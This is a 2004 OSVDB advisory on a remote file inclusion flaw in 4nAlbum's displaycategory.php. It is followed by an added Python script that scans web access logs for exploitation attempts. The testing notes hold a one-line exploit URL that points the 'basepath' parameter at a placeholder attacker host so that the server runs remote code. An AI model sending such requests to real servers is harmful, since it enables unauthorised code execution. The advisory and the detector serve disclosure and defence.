4nAlbum displaycategory.php Remote File Inclusion

2004-03-15T09:32:34
ID OSVDB:4292
Type osvdb
Reporter Janek Vind "waraxe" (come2waraxe@yahoo.com)
Modified 2004-03-15T09:32:34

Description

Vulnerability Description

4nAlbum contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the displaycategory.php script not properly sanitizing input to the "basepath" variable. An attacker may use this to include an arbitrary file from a remote server, which the script then processes, executing any commands the file contains.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes

http://[victim]/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://[attacker]/
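
With no patch available, access logs can be checked for requests of the form shown above. The following is an added example, not part of the original advisory: it flags requests to displaycategory.php whose "basepath" parameter decodes to a remote URL. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client address and request target of a combined-format access log line (assumed format).
LINE_RE = re.compile(r'^(?P<client>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A value that starts with scheme:// would make the script include from another host.
REMOTE_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.IGNORECASE)
SCRIPT = "/displaycategory.php"

def remote_basepath(target):
    """Return the decoded basepath value if it names a remote URL, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(SCRIPT):
        return None
    # parse_qsl percent-decodes once, so encoded variants are compared in decoded form.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key == "basepath" and REMOTE_RE.match(value):
            return value
    return None

def scan(lines):
    """Return (line_number, client, basepath) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = LINE_RE.match(line)
        if not match:
            continue  # not a request line in the assumed format
        value = remote_basepath(match.group("target"))
        if value is not None:
            hits.append((number, match.group("client"), value))
    return hits

# Constructed sample log lines (documentation addresses and hostnames, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Mar/2004:09:40:01 +0000] "GET /nuke71/modules/4nalbum/public/displaycategory.php?cat=3 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [15/Mar/2004:09:41:12 +0000] "GET /nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://remote.example/ HTTP/1.0" 200 311 "-" "-"',
    '198.51.100.7 - - [15/Mar/2004:09:41:15 +0000] "GET /nuke71/modules/4nalbum/public/displaycategory.php?basepath=HTTP%3A%2F%2Fremote.example%2F HTTP/1.0" 200 311 "-" "-"',
    '192.0.2.44 - - [15/Mar/2004:09:42:30 +0000] "GET /nuke71/index.php?basepath=http://remote.example/ HTTP/1.1" 200 9000 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for number, client, value in scan(SAMPLE_LOG):
        print(f"line {number}: {client} sent basepath={value!r}")
```

Values sent in a POST body or cookie do not appear in the access log, so this check covers query-string requests only.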

References:

Vendor URL: http://www.warp-speed.de/
Security Tracker: 1009449
Secunia Advisory ID: 11134
Related OSVDB ID: 4293
Related OSVDB ID: 4291
Related OSVDB ID: 4294
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0142.html
ISS X-Force ID: 15496
Bugtraq ID: 9881